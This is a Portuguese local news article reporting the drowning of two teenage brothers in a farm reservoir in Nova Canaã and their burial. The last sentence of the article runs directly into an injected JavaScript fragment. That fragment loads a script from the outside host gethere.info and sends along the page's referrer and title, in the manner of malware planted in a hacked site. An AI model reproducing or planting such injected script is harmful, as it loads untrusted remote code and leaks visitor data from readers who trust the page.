Capa / Cidades / Irmãos mortos em Nova Canaã serão sepultados hoje

Irmãos mortos em Nova Canaã serão sepultados hoje

20182018Nortão Online /Angela Fogaça

Serão sepultados hoje à tarde, os dois Irmãos de 18 e 17 anos que morreram afogados em uma represa no último sábado à tarde. O velório está sendo realizado na capela mortuária de Nova Canaã. A tragédia abalou a cidade.Os dois eram filhos de um casal que trabalha na fazenda e moravam em uma casa há 300 metros da represa.

Os corpos foram resgatados da represa pela Polícia Civil, que foi acionada para verificar a ocorrência, na fazenda São Francisco, na ComunidadeTapaiúna.

Os jovens P.S.P.S, 18 anos e M.P.P.S, de 17,  estavam pescando na referida represa. Segundo informações, um dos anzóis estava enroscado e provavelmente um dos irmãos que não sabia nadar, foi desenroscar, começou a se afogar e o outro foi tentar salvá-lo.

Segundo o delegado Ruy Guilherme Peral da Silva, o caso será investigado para se obter maiores detalhes de como ocorreram os fatos. Foi requisitado o exame necroscópico para se averiguar a “causa mortis”, mas tudo aponta que foi afogamento.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top